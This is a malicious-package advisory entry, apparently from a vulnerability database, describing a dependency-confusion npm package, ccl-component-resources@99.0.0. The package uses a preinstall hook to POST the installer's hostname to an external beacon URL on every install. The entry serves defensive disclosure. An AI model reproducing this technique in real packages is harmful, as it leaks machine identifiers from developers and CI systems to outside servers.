MAL-2024-1959

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (a3aab5a60bbc55422ada7e8937985342cfee30ddac8e35dab2c0d03eb3d12d23) ccl-component-resources@99.0.0 is a dependency-confusion package: name targets a likely-internal package, semver is set to 99.0.0 to win resolution against private registries, and index.js is an empty stub (`module.exports = {}`). package.json declares a `preinstall` lifecycle hook that runs `node pingback.js`. pingback.js reads `os.hostname()` and POSTs a JSON payload (`{hn,...package name, timestamp}`) to https://c.adityasec.com/hJWEvPPiaUrSeF-9_F8XSw on every `npm install`. Any installer whose private dependency resolution mistakenly pulls this public package will leak the host identifier of the affected dev or CI machine to an external server. The package self-describes as an 'authorized PoC,' but the beacon fires unconditionally for every installer regardless of authorization, and the destination is attacker-controlled from the installer's perspective.